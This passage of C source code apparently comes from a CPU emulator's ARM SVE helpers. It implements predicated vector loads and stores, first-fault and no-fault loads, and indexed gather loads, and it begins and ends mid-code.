DO_LD_PRIM_2(ld1dd, le, MO_LE, , uint64_t, uint64_t, ldq, ldq) DO_LD_PRIM_2(ld1hh, be, MO_BE, H1_2, uint16_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hsu, be, MO_BE, H1_4, uint32_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hss, be, MO_BE, H1_4, uint32_t, int16_t, lduw, lduw) DO_LD_PRIM_2(ld1hdu, be, MO_BE, , uint64_t, uint16_t, lduw, lduw) DO_LD_PRIM_2(ld1hds, be, MO_BE, , uint64_t, int16_t, lduw, lduw) DO_LD_PRIM_2(ld1ss, be, MO_BE, H1_4, uint32_t, uint32_t, ldl, ldul) DO_LD_PRIM_2(ld1sdu, be, MO_BE, , uint64_t, uint32_t, ldl, ldul) DO_LD_PRIM_2(ld1sds, be, MO_BE, , uint64_t, int32_t, ldl, ldul) DO_LD_PRIM_2(ld1dd, be, MO_BE, , uint64_t, uint64_t, ldq, ldq) #undef DO_LD_TLB #undef DO_LD_HOST #undef DO_LD_PRIM_1 #undef DO_LD_PRIM_2 /* * Skip through a sequence of inactive elements in the guarding predicate @vg, * beginning at @reg_off bounded by @reg_max. Return the offset of the active * element >= @reg_off, or @reg_max if there were no active elements at all. */ static intptr_t find_next_active(uint64_t *vg, intptr_t reg_off, intptr_t reg_max, int esz) { uint64_t pg_mask = pred_esz_masks[esz]; uint64_t pg = (vg[reg_off >> 6] & pg_mask) >> (reg_off & 63); /* In normal usage, the first element is active. */ if (likely(pg & 1)) { return reg_off; } if (pg == 0) { reg_off &= -64; do { reg_off += 64; if (unlikely(reg_off >= reg_max)) { /* The entire predicate was false. */ return reg_max; } pg = vg[reg_off >> 6] & pg_mask; } while (pg == 0); } reg_off += ctz64(pg); /* We should never see an out of range predicate bit set. */ tcg_debug_assert(reg_off < reg_max); return reg_off; } /* * Return the maximum offset <= @mem_max which is still within the page * referenced by @base + @mem_off. */ static intptr_t max_for_page(struct uc_struct *uc, target_ulong base, intptr_t mem_off, intptr_t mem_max) { target_ulong addr = base + mem_off; intptr_t split = -(intptr_t)(addr | TARGET_PAGE_MASK); return MIN(split, mem_max - mem_off) + mem_off; } /* These are normally defined only for CONFIG_USER_ONLY in <exec/cpu_ldst.h> */ static inline void set_helper_retaddr(uintptr_t ra) { } static inline void clear_helper_retaddr(void) { } /* * The result of tlb_vaddr_to_host for user-only is just g2h(x), * which is always non-null. Elide the useless test. */ static inline bool test_host_page(void *host) { return likely(host != NULL); } /* * Common helper for all contiguous one-register predicated loads. */ static void sve_ld1_r(CPUARMState *env, void *vg, const target_ulong addr, uint32_t desc, const uintptr_t retaddr, const int esz, const int msz, sve_ld1_host_fn *host_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int mmu_idx = get_mmuidx(oi); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); void *vd = &env->vfp.zregs[rd]; const int diffsz = esz - msz; const intptr_t reg_max = simd_oprsz(desc); const intptr_t mem_max = reg_max >> diffsz; ARMVectorReg scratch; void *host; intptr_t split, reg_off, mem_off; /* Find the first active element. */ reg_off = find_next_active(vg, 0, reg_max, esz); if (unlikely(reg_off == reg_max)) { /* The entire predicate was false; no load occurs. */ memset(vd, 0, reg_max); return; } mem_off = reg_off >> diffsz; set_helper_retaddr(retaddr); /* * If the (remaining) load is entirely within a single page, then: * For softmmu, and the tlb hits, then no faults will occur; * For user-only, either the first load will fault or none will. * We can thus perform the load directly to the destination and * Vd will be unmodified on any exception path. */ split = max_for_page(env->uc, addr, mem_off, mem_max); if (likely(split == mem_max)) { host = tlb_vaddr_to_host(env, addr + mem_off, MMU_DATA_LOAD, mmu_idx); if (test_host_page(host)) { mem_off = host_fn(vd, vg, (char *)host - mem_off, mem_off, mem_max); tcg_debug_assert(mem_off == mem_max); clear_helper_retaddr(); /* After having taken any fault, zero leading inactive elements. */ swap_memzero(vd, reg_off); return; } } /* * Perform the predicated read into a temporary, thus ensuring * if the load of the last element faults, Vd is not modified. */ memset(&scratch, 0, reg_max); goto start; while (1) { reg_off = find_next_active(vg, reg_off, reg_max, esz); if (reg_off >= reg_max) { break; } mem_off = reg_off >> diffsz; split = max_for_page(env->uc, addr, mem_off, mem_max); start: if (split - mem_off >= (1ULL << msz)) { /* At least one whole element on this page. */ host = tlb_vaddr_to_host(env, addr + mem_off, MMU_DATA_LOAD, mmu_idx); if (host) { mem_off = host_fn(&scratch, vg, (char *)host - mem_off, mem_off, split); reg_off = mem_off << diffsz; continue; } } /* * Perform one normal read. This may fault, longjmping out to the * main loop in order to raise an exception. It may succeed, and * as a side-effect load the TLB entry for the next round. Finally, * in the extremely unlikely case we're performing this operation * on I/O memory, it may succeed but not bring in the TLB entry. * But even then we have still made forward progress. */ tlb_fn(env, &scratch, reg_off, addr + mem_off, oi, retaddr); reg_off += 1ULL << esz; } clear_helper_retaddr(); memcpy(vd, &scratch, reg_max); } #define DO_LD1_1(NAME, ESZ) \ void HELPER(sve_##NAME##_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ld1_r(env, vg, addr, desc, GETPC(), ESZ, 0, \ sve_##NAME##_host, sve_##NAME##_tlb); \ } #define DO_LD1_2(NAME, ESZ, MSZ) \ void HELPER(sve_##NAME##_le_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ld1_r(env, vg, addr, desc, GETPC(), ESZ, MSZ, \ sve_##NAME##_le_host, sve_##NAME##_le_tlb); \ } \ void HELPER(sve_##NAME##_be_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ld1_r(env, vg, addr, desc, GETPC(), ESZ, MSZ, \ sve_##NAME##_be_host, sve_##NAME##_be_tlb); \ } DO_LD1_1(ld1bb, 0) DO_LD1_1(ld1bhu, 1) DO_LD1_1(ld1bhs, 1) DO_LD1_1(ld1bsu, 2) DO_LD1_1(ld1bss, 2) DO_LD1_1(ld1bdu, 3) DO_LD1_1(ld1bds, 3) DO_LD1_2(ld1hh, 1, 1) DO_LD1_2(ld1hsu, 2, 1) DO_LD1_2(ld1hss, 2, 1) DO_LD1_2(ld1hdu, 3, 1) DO_LD1_2(ld1hds, 3, 1) DO_LD1_2(ld1ss, 2, 2) DO_LD1_2(ld1sdu, 3, 2) DO_LD1_2(ld1sds, 3, 2) DO_LD1_2(ld1dd, 3, 3) #undef DO_LD1_1 #undef DO_LD1_2 /* * Common helpers for all contiguous 2,3,4-register predicated loads. */ static void sve_ld2_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, int size, uintptr_t ra, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); ARMVectorReg scratch[2] = { 0 }; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, &scratch[0], i, addr, oi, ra); tlb_fn(env, &scratch[1], i, addr + size, oi, ra); } i += size, pg >>= size; addr += 2 * size; } while (i & 15); } clear_helper_retaddr(); /* Wait until all exceptions have been raised to write back. */ memcpy(&env->vfp.zregs[rd], &scratch[0], oprsz); memcpy(&env->vfp.zregs[(rd + 1) & 31], &scratch[1], oprsz); } static void sve_ld3_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, int size, uintptr_t ra, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); ARMVectorReg scratch[3] = { 0 }; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, &scratch[0], i, addr, oi, ra); tlb_fn(env, &scratch[1], i, addr + size, oi, ra); tlb_fn(env, &scratch[2], i, addr + 2 * size, oi, ra); } i += size, pg >>= size; addr += 3 * size; } while (i & 15); } clear_helper_retaddr(); /* Wait until all exceptions have been raised to write back. */ memcpy(&env->vfp.zregs[rd], &scratch[0], oprsz); memcpy(&env->vfp.zregs[(rd + 1) & 31], &scratch[1], oprsz); memcpy(&env->vfp.zregs[(rd + 2) & 31], &scratch[2], oprsz); } static void sve_ld4_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, int size, uintptr_t ra, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); ARMVectorReg scratch[4] = { 0 }; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, &scratch[0], i, addr, oi, ra); tlb_fn(env, &scratch[1], i, addr + size, oi, ra); tlb_fn(env, &scratch[2], i, addr + 2 * size, oi, ra); tlb_fn(env, &scratch[3], i, addr + 3 * size, oi, ra); } i += size, pg >>= size; addr += 4 * size; } while (i & 15); } clear_helper_retaddr(); /* Wait until all exceptions have been raised to write back. */ memcpy(&env->vfp.zregs[rd], &scratch[0], oprsz); memcpy(&env->vfp.zregs[(rd + 1) & 31], &scratch[1], oprsz); memcpy(&env->vfp.zregs[(rd + 2) & 31], &scratch[2], oprsz); memcpy(&env->vfp.zregs[(rd + 3) & 31], &scratch[3], oprsz); } #define DO_LDN_1(N) \ void QEMU_FLATTEN HELPER(sve_ld##N##bb_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_ld##N##_r(env, vg, addr, desc, 1, GETPC(), sve_ld1bb_tlb); \ } #define DO_LDN_2(N, SUFF, SIZE) \ void QEMU_FLATTEN HELPER(sve_ld##N##SUFF##_le_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_ld##N##_r(env, vg, addr, desc, SIZE, GETPC(), \ sve_ld1##SUFF##_le_tlb); \ } \ void QEMU_FLATTEN HELPER(sve_ld##N##SUFF##_be_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_ld##N##_r(env, vg, addr, desc, SIZE, GETPC(), \ sve_ld1##SUFF##_be_tlb); \ } DO_LDN_1(2) DO_LDN_1(3) DO_LDN_1(4) DO_LDN_2(2, hh, 2) DO_LDN_2(3, hh, 2) DO_LDN_2(4, hh, 2) DO_LDN_2(2, ss, 4) DO_LDN_2(3, ss, 4) DO_LDN_2(4, ss, 4) DO_LDN_2(2, dd, 8) DO_LDN_2(3, dd, 8) DO_LDN_2(4, dd, 8) #undef DO_LDN_1 #undef DO_LDN_2 /* * Load contiguous data, first-fault and no-fault. * * For user-only, one could argue that we should hold the mmap_lock during * the operation so that there is no race between page_check_range and the * load operation. However, unmapping pages out from under a running thread * is extraordinarily unlikely. This theoretical race condition also affects * linux-user/ in its get_user/put_user macros. * * TODO: Construct some helpers, written in assembly, that interact with * handle_cpu_signal to produce memory ops which can properly report errors * without racing. */ /* Fault on byte I. All bits in FFR from I are cleared. The vector * result from I is CONSTRAINED UNPREDICTABLE; we choose the MERGE * option, which leaves subsequent data unchanged. */ static void record_fault(CPUARMState *env, uintptr_t i, uintptr_t oprsz) { uint64_t *ffr = env->vfp.pregs[FFR_PRED_NUM].p; if (i & 63) { ffr[i / 64] &= MAKE_64BIT_MASK(0, i & 63); i = ROUND_UP(i, 64); } for (; i < oprsz; i += 64) { ffr[i / 64] = 0; } } /* * Common helper for all contiguous first-fault loads. */ static void sve_ldff1_r(CPUARMState *env, void *vg, const target_ulong addr, uint32_t desc, const uintptr_t retaddr, const int esz, const int msz, sve_ld1_host_fn *host_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int mmu_idx = get_mmuidx(oi); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); void *vd = &env->vfp.zregs[rd]; const int diffsz = esz - msz; const intptr_t reg_max = simd_oprsz(desc); const intptr_t mem_max = reg_max >> diffsz; intptr_t split, reg_off, mem_off; void *host; /* Skip to the first active element. */ reg_off = find_next_active(vg, 0, reg_max, esz); if (unlikely(reg_off == reg_max)) { /* The entire predicate was false; no load occurs. */ memset(vd, 0, reg_max); return; } mem_off = reg_off >> diffsz; set_helper_retaddr(retaddr); /* * If the (remaining) load is entirely within a single page, then: * For softmmu, and the tlb hits, then no faults will occur; * For user-only, either the first load will fault or none will. * We can thus perform the load directly to the destination and * Vd will be unmodified on any exception path. */ split = max_for_page(env->uc, addr, mem_off, mem_max); if (likely(split == mem_max)) { host = tlb_vaddr_to_host(env, addr + mem_off, MMU_DATA_LOAD, mmu_idx); if (test_host_page(host)) { mem_off = host_fn(vd, vg, (char *)host - mem_off, mem_off, mem_max); tcg_debug_assert(mem_off == mem_max); clear_helper_retaddr(); /* After any fault, zero any leading inactive elements. */ swap_memzero(vd, reg_off); return; } } /* * Perform one normal read, which will fault or not. * But it is likely to bring the page into the tlb. */ tlb_fn(env, vd, reg_off, addr + mem_off, oi, retaddr); /* After any fault, zero any leading predicated false elts. */ swap_memzero(vd, reg_off); mem_off += 1ULL << msz; reg_off += 1ULL << esz; /* Try again to read the balance of the page. */ split = max_for_page(env->uc, addr, mem_off - 1, mem_max); if (split >= (1ULL << msz)) { host = tlb_vaddr_to_host(env, addr + mem_off, MMU_DATA_LOAD, mmu_idx); if (host) { mem_off = host_fn(vd, vg, (char *)host - mem_off, mem_off, split); reg_off = mem_off << diffsz; } } clear_helper_retaddr(); record_fault(env, reg_off, reg_max); } /* * Common helper for all contiguous no-fault loads. */ static void sve_ldnf1_r(CPUARMState *env, void *vg, const target_ulong addr, uint32_t desc, const int esz, const int msz, sve_ld1_host_fn *host_fn) { const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); void *vd = &env->vfp.zregs[rd]; const int diffsz = esz - msz; const intptr_t reg_max = simd_oprsz(desc); const intptr_t mem_max = reg_max >> diffsz; const int mmu_idx = cpu_mmu_index(env, false); intptr_t split, reg_off, mem_off; void *host; /* There will be no fault, so we may modify in advance. */ memset(vd, 0, reg_max); /* Skip to the first active element. */ reg_off = find_next_active(vg, 0, reg_max, esz); if (unlikely(reg_off == reg_max)) { /* The entire predicate was false; no load occurs. */ return; } mem_off = reg_off >> diffsz; /* * If the address is not in the TLB, we have no way to bring the * entry into the TLB without also risking a fault. Note that * the corollary is that we never load from an address not in RAM. * * This last is out of spec, in a weird corner case. * Per the MemNF/MemSingleNF pseudocode, a NF load from Device memory * must not actually hit the bus -- it returns UNKNOWN data instead. * But if you map non-RAM with Normal memory attributes and do a NF * load then it should access the bus. (Nobody ought actually do this * in the real world, obviously.) * * Then there are the annoying special cases with watchpoints... * TODO: Add a form of non-faulting loads using cc->tlb_fill(probe=true). */ host = tlb_vaddr_to_host(env, addr + mem_off, MMU_DATA_LOAD, mmu_idx); split = max_for_page(env->uc, addr, mem_off, mem_max); if (host && split >= (1ULL << msz)) { mem_off = host_fn(vd, vg, (char *)host - mem_off, mem_off, split); reg_off = mem_off << diffsz; } record_fault(env, reg_off, reg_max); } #define DO_LDFF1_LDNF1_1(PART, ESZ) \ void HELPER(sve_ldff1##PART##_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldff1_r(env, vg, addr, desc, GETPC(), ESZ, 0, \ sve_ld1##PART##_host, sve_ld1##PART##_tlb); \ } \ void HELPER(sve_ldnf1##PART##_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldnf1_r(env, vg, addr, desc, ESZ, 0, sve_ld1##PART##_host); \ } #define DO_LDFF1_LDNF1_2(PART, ESZ, MSZ) \ void HELPER(sve_ldff1##PART##_le_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldff1_r(env, vg, addr, desc, GETPC(), ESZ, MSZ, \ sve_ld1##PART##_le_host, sve_ld1##PART##_le_tlb); \ } \ void HELPER(sve_ldnf1##PART##_le_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldnf1_r(env, vg, addr, desc, ESZ, MSZ, sve_ld1##PART##_le_host); \ } \ void HELPER(sve_ldff1##PART##_be_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldff1_r(env, vg, addr, desc, GETPC(), ESZ, MSZ, \ sve_ld1##PART##_be_host, sve_ld1##PART##_be_tlb); \ } \ void HELPER(sve_ldnf1##PART##_be_r)(CPUARMState *env, void *vg, \ target_ulong addr, uint32_t desc) \ { \ sve_ldnf1_r(env, vg, addr, desc, ESZ, MSZ, sve_ld1##PART##_be_host); \ } DO_LDFF1_LDNF1_1(bb, 0) DO_LDFF1_LDNF1_1(bhu, 1) DO_LDFF1_LDNF1_1(bhs, 1) DO_LDFF1_LDNF1_1(bsu, 2) DO_LDFF1_LDNF1_1(bss, 2) DO_LDFF1_LDNF1_1(bdu, 3) DO_LDFF1_LDNF1_1(bds, 3) DO_LDFF1_LDNF1_2(hh, 1, 1) DO_LDFF1_LDNF1_2(hsu, 2, 1) DO_LDFF1_LDNF1_2(hss, 2, 1) DO_LDFF1_LDNF1_2(hdu, 3, 1) DO_LDFF1_LDNF1_2(hds, 3, 1) DO_LDFF1_LDNF1_2(ss, 2, 2) DO_LDFF1_LDNF1_2(sdu, 3, 2) DO_LDFF1_LDNF1_2(sds, 3, 2) DO_LDFF1_LDNF1_2(dd, 3, 3) #undef DO_LDFF1_LDNF1_1 #undef DO_LDFF1_LDNF1_2 /* * Store contiguous data, protected by a governing predicate. */ #define DO_ST_TLB(NAME, H, TYPEM, HOST, MOEND, TLB) \ static void sve_##NAME##_tlb(CPUARMState *env, void *vd, intptr_t reg_off, \ target_ulong addr, TCGMemOpIdx oi, uintptr_t ra) \ { \ TLB(env, addr, *(TYPEM *)((char *)vd + H(reg_off)), oi, ra); \ } DO_ST_TLB(st1bb, H1, uint8_t, stb_p, 0, helper_ret_stb_mmu) DO_ST_TLB(st1bh, H1_2, uint16_t, stb_p, 0, helper_ret_stb_mmu) DO_ST_TLB(st1bs, H1_4, uint32_t, stb_p, 0, helper_ret_stb_mmu) DO_ST_TLB(st1bd, , uint64_t, stb_p, 0, helper_ret_stb_mmu) DO_ST_TLB(st1hh_le, H1_2, uint16_t, stw_le_p, MO_LE, helper_le_stw_mmu) DO_ST_TLB(st1hs_le, H1_4, uint32_t, stw_le_p, MO_LE, helper_le_stw_mmu) DO_ST_TLB(st1hd_le, , uint64_t, stw_le_p, MO_LE, helper_le_stw_mmu) DO_ST_TLB(st1ss_le, H1_4, uint32_t, stl_le_p, MO_LE, helper_le_stl_mmu) DO_ST_TLB(st1sd_le, , uint64_t, stl_le_p, MO_LE, helper_le_stl_mmu) DO_ST_TLB(st1dd_le, , uint64_t, stq_le_p, MO_LE, helper_le_stq_mmu) DO_ST_TLB(st1hh_be, H1_2, uint16_t, stw_be_p, MO_BE, helper_be_stw_mmu) DO_ST_TLB(st1hs_be, H1_4, uint32_t, stw_be_p, MO_BE, helper_be_stw_mmu) DO_ST_TLB(st1hd_be, , uint64_t, stw_be_p, MO_BE, helper_be_stw_mmu) DO_ST_TLB(st1ss_be, H1_4, uint32_t, stl_be_p, MO_BE, helper_be_stl_mmu) DO_ST_TLB(st1sd_be, , uint64_t, stl_be_p, MO_BE, helper_be_stl_mmu) DO_ST_TLB(st1dd_be, , uint64_t, stq_be_p, MO_BE, helper_be_stq_mmu) #undef DO_ST_TLB /* * Common helpers for all contiguous 1,2,3,4-register predicated stores. */ static void sve_st1_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, const uintptr_t ra, const int esize, const int msize, sve_st1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); void *vd = &env->vfp.zregs[rd]; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, vd, i, addr, oi, ra); } i += esize, pg >>= esize; addr += msize; } while (i & 15); } clear_helper_retaddr(); } static void sve_st2_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, const uintptr_t ra, const int esize, const int msize, sve_st1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); void *d1 = &env->vfp.zregs[rd]; void *d2 = &env->vfp.zregs[(rd + 1) & 31]; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, d1, i, addr, oi, ra); tlb_fn(env, d2, i, addr + msize, oi, ra); } i += esize, pg >>= esize; addr += 2 * msize; } while (i & 15); } clear_helper_retaddr(); } static void sve_st3_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, const uintptr_t ra, const int esize, const int msize, sve_st1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); void *d1 = &env->vfp.zregs[rd]; void *d2 = &env->vfp.zregs[(rd + 1) & 31]; void *d3 = &env->vfp.zregs[(rd + 2) & 31]; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, d1, i, addr, oi, ra); tlb_fn(env, d2, i, addr + msize, oi, ra); tlb_fn(env, d3, i, addr + 2 * msize, oi, ra); } i += esize, pg >>= esize; addr += 3 * msize; } while (i & 15); } clear_helper_retaddr(); } static void sve_st4_r(CPUARMState *env, void *vg, target_ulong addr, uint32_t desc, const uintptr_t ra, const int esize, const int msize, sve_st1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const unsigned rd = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 5); intptr_t i, oprsz = simd_oprsz(desc); void *d1 = &env->vfp.zregs[rd]; void *d2 = &env->vfp.zregs[(rd + 1) & 31]; void *d3 = &env->vfp.zregs[(rd + 2) & 31]; void *d4 = &env->vfp.zregs[(rd + 3) & 31]; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { tlb_fn(env, d1, i, addr, oi, ra); tlb_fn(env, d2, i, addr + msize, oi, ra); tlb_fn(env, d3, i, addr + 2 * msize, oi, ra); tlb_fn(env, d4, i, addr + 3 * msize, oi, ra); } i += esize, pg >>= esize; addr += 4 * msize; } while (i & 15); } clear_helper_retaddr(); } #define DO_STN_1(N, NAME, ESIZE) \ void QEMU_FLATTEN HELPER(sve_st##N##NAME##_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_st##N##_r(env, vg, addr, desc, GETPC(), ESIZE, 1, \ sve_st1##NAME##_tlb); \ } #define DO_STN_2(N, NAME, ESIZE, MSIZE) \ void QEMU_FLATTEN HELPER(sve_st##N##NAME##_le_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_st##N##_r(env, vg, addr, desc, GETPC(), ESIZE, MSIZE, \ sve_st1##NAME##_le_tlb); \ } \ void QEMU_FLATTEN HELPER(sve_st##N##NAME##_be_r) \ (CPUARMState *env, void *vg, target_ulong addr, uint32_t desc) \ { \ sve_st##N##_r(env, vg, addr, desc, GETPC(), ESIZE, MSIZE, \ sve_st1##NAME##_be_tlb); \ } DO_STN_1(1, bb, 1) DO_STN_1(1, bh, 2) DO_STN_1(1, bs, 4) DO_STN_1(1, bd, 8) DO_STN_1(2, bb, 1) DO_STN_1(3, bb, 1) DO_STN_1(4, bb, 1) DO_STN_2(1, hh, 2, 2) DO_STN_2(1, hs, 4, 2) DO_STN_2(1, hd, 8, 2) DO_STN_2(2, hh, 2, 2) DO_STN_2(3, hh, 2, 2) DO_STN_2(4, hh, 2, 2) DO_STN_2(1, ss, 4, 4) DO_STN_2(1, sd, 8, 4) DO_STN_2(2, ss, 4, 4) DO_STN_2(3, ss, 4, 4) DO_STN_2(4, ss, 4, 4) DO_STN_2(1, dd, 8, 8) DO_STN_2(2, dd, 8, 8) DO_STN_2(3, dd, 8, 8) DO_STN_2(4, dd, 8, 8) #undef DO_STN_1 #undef DO_STN_2 /* * Loads with a vector index. */ /* * Load the element at @reg + @reg_ofs, sign or zero-extend as needed. */ typedef target_ulong zreg_off_fn(void *reg, intptr_t reg_ofs); static target_ulong off_zsu_s(void *reg, intptr_t reg_ofs) { return *(uint32_t *)((char *)reg + H1_4(reg_ofs)); } static target_ulong off_zss_s(void *reg, intptr_t reg_ofs) { return *(int32_t *)((char *)reg + H1_4(reg_ofs)); } static target_ulong off_zsu_d(void *reg, intptr_t reg_ofs) { return (uint32_t)*(uint64_t *)((char *)reg + reg_ofs); } static target_ulong off_zss_d(void *reg, intptr_t reg_ofs) { return (int32_t)*(uint64_t *)((char *)reg + reg_ofs); } static target_ulong off_zd_d(void *reg, intptr_t reg_ofs) { return *(uint64_t *)((char *)reg + reg_ofs); } static void sve_ld1_zs(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t i, oprsz = simd_oprsz(desc); ARMVectorReg scratch = { 0 }; set_helper_retaddr(ra); for (i = 0; i < oprsz; ) { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (likely(pg & 1)) { target_ulong off = off_fn(vm, i); tlb_fn(env, &scratch, i, base + (off << scale), oi, ra); } i += 4, pg >>= 4; } while (i & 15); } clear_helper_retaddr(); /* Wait until all exceptions have been raised to write back. */ memcpy(vd, &scratch, oprsz); } static void sve_ld1_zd(CPUARMState *env, void *vd, void *vg, void *vm, target_ulong base, uint32_t desc, uintptr_t ra, zreg_off_fn *off_fn, sve_ld1_tlb_fn *tlb_fn) { const TCGMemOpIdx oi = extract32(desc, SIMD_DATA_SHIFT, MEMOPIDX_SHIFT); const int scale = extract32(desc, SIMD_DATA_SHIFT + MEMOPIDX_SHIFT, 2); intptr_t i, oprsz = simd_oprsz(desc) / 8; ARMVectorReg scratch = { 0 }; set_helper_retaddr(ra); for (i = 0; i < oprsz; i++) { uint8_t pg = *(uint8_t *)((char *)vg + H1(i)); if (likely(pg & 1)) { target_ulong off = off_fn(vm, i * 8); tlb_fn(env, &scratch, i * 8, base + (off << scale), oi, ra); } } clear_helper_retaddr(); /* Wait until all exceptions have been raised to write back. */ memcpy(vd, &scratch, oprsz * 8); } #define DO_LD1_ZPZ_S(MEM, OFS) \ void QEMU_FLATTEN HELPER(sve_ld##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_ld1_zs(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_s, sve_ld1##MEM##_tlb); \ } #define DO_LD1_ZPZ_D(MEM, OFS) \ void QEMU_FLATTEN HELPER(sve_ld##MEM##_##OFS) \ (CPUARMState *env, void *vd, void *vg, void *vm, \ target_ulong base, uint32_t desc) \ { \ sve_ld1_zd(env, vd, vg, vm, base, desc, GETPC(), \ off_##OFS##_d, sve_ld1##MEM##_tlb); \ } DO_LD1_ZPZ_S(bsu, zsu) DO_LD1_ZPZ_S(bsu, zss) DO_LD1_ZPZ_D(bdu, zsu) DO_LD1_ZPZ_D(bdu, zss) DO_LD1_ZPZ_D(bdu, zd) DO_LD1_ZPZ_S(bss, zsu) DO_LD1_ZPZ_S(bss, zss) DO_LD1_ZPZ_D(bds, zsu) DO_LD1_ZPZ_D(bds, zss) DO_LD1_ZPZ_D(bds, zd) DO_LD1_ZPZ_S(hsu_le, zsu) DO_LD1_ZPZ_S(hsu_le, zss) DO_LD1_ZPZ_D(hdu_le, zsu) DO_LD1_ZPZ_D(hdu_le, zss) DO_LD1_ZPZ_D(hdu_le, zd) DO_LD1_ZPZ_S(hsu_be, zsu) DO_LD1_ZPZ_S(hsu_be, zss) DO_LD1_ZPZ_D(hdu_be, zsu) DO_LD1_ZPZ_D(hdu_be, zss) DO_LD1_ZPZ_D(hdu_be, zd) DO_LD1_ZPZ_S(hss_le, zsu) DO_LD1_ZPZ_S(hss_le, zss) DO_LD1_ZPZ_D(hds_le, 